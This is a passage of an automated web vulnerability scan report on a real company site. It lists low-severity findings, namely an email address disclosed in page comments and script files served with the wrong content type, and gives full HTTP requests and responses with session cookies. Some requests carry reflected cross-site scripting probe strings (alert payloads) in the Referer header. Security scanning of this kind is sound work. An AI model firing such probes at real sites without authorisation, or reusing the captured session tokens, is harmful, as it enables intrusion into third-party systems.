
The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.abbott-langer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 20:41:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=13832050;expires=Sun, 26-May-2041 20:41:48 GMT;path=/
Set-Cookie: CFTOKEN=d3cc162c5fa63b7e-573D8707-BD3A-3DAC-6285919E0D62C3A0;expires=Sun, 26-May-2041 20:41:48 GMT;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: CFID=13832050;path=/
Set-Cookie: CFTOKEN=d3cc162c5fa63b7e%2D573D8707%2DBD3A%2D3DAC%2D6285919E0D62C3A0;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=13832050%2Dd3cc162c5fa63b7e%2D573D8707%2DBD3A%2D3DAC%2D6285919E0D62C3A0%7C%7C06%2F03%2F2011%2001%3A41%3A48%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
<!-- QuerySim.cfm by hal.helms@TeamAllaire.com -->
<!-- QuerySim.cfm by hal.helms@TeamAllaire.com -->
...[SNIP]...

4.2. http://www.abbott-langer.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbott-langer.com
Path:   /index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /index.cfm HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1
Cookie: LICENSECODE=; MODE=; CFID=5950531; CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8; STOREID=6; TRKID=; INTTRKID=; USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM; VID=3; SessionCookieTest=testing123; PersistentCookieTest=testing123; __utma=92019530.1461229368.1307134120.1307134120.1307134120.1; __utmb=92019530.1.10.1307134120; __utmc=92019530; __utmz=92019530.1307134120.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSIONID=

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 20:49:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A31%20PM;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A31%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E1%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E1%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E1%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E1%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A31%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E1%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E1%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A35%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
<!-- QuerySim.cfm by hal.helms@TeamAllaire.com -->
<!-- QuerySim.cfm by hal.helms@TeamAllaire.com -->
...[SNIP]...

5. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


5.1. http://www.abbott-langer.com/JS/general.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.abbott-langer.com
Path:   /JS/general.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /JS/general.js HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.abbott-langer.com/?da443%22-alert(1)-%22dacf051550a=1
Cookie: LICENSECODE=; MODE=; CFID=13832120; CFTOKEN=70e2d51d045715e2%2D573DFBE7%2DC13E%2D90A0%2D8D91B5F4CAEFB847; STOREID=6; TRKID=; INTTRKID=; USERTRACKER=13832120%2D70e2d51d045715e2%2D573DFBE7%2DC13E%2D90A0%2D8D91B5F4CAEFB847%7C%7C06%2F03%2F2011%2001%3A42%3A18%20PM; VID=3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://www.abbott-langer.com/JS/general.js
Last-Modified: Wed, 18 Mar 2009 19:41:19 GMT
Accept-Ranges: bytes
ETag: "c853b5821a8c91:19af6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 03 Jun 2011 20:48:28 GMT
Vary: Accept-Encoding, User-Agent
Connection: close

<!-- Hide script from old browsers

   //Opens Custom Pop-Up Window in Center of User's Screen
   /* To implement this JavaScript, simply cut/paste the following code into your form and enter the desi
...[SNIP]...

5.2. http://www.abbott-langer.com/ShopCart/Fuses/JS/general.js  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.abbott-langer.com
Path:   /ShopCart/Fuses/JS/general.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /ShopCart/Fuses/JS/general.js HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.abbott-langer.com/?da443%22-alert(1)-%22dacf051550a=1
Cookie: LICENSECODE=; MODE=; CFID=13832120; CFTOKEN=70e2d51d045715e2%2D573DFBE7%2DC13E%2D90A0%2D8D91B5F4CAEFB847; STOREID=6; TRKID=; INTTRKID=; USERTRACKER=13832120%2D70e2d51d045715e2%2D573DFBE7%2DC13E%2D90A0%2D8D91B5F4CAEFB847%7C%7C06%2F03%2F2011%2001%3A42%3A18%20PM; VID=3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://www.abbott-langer.com/ShopCart/Fuses/JS/general.js
Last-Modified: Thu, 11 Mar 2010 17:44:26 GMT
Accept-Ranges: bytes
ETag: "d58c837e42c1ca1:19af6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 03 Jun 2011 20:48:28 GMT
Vary: Accept-Encoding, User-Agent
Connection: close

<!-- Hide script from old browsers
   
   /*
   
       Change location with button click
           onclick="JavaScript:self.location.href='http://mysite.com'"
       
       Set Timeout
           setTimeout("UpdateParentClose
...[SNIP]...

Report generated by XSS.CX at Sun Jun 05 06:38:56 CDT 2011.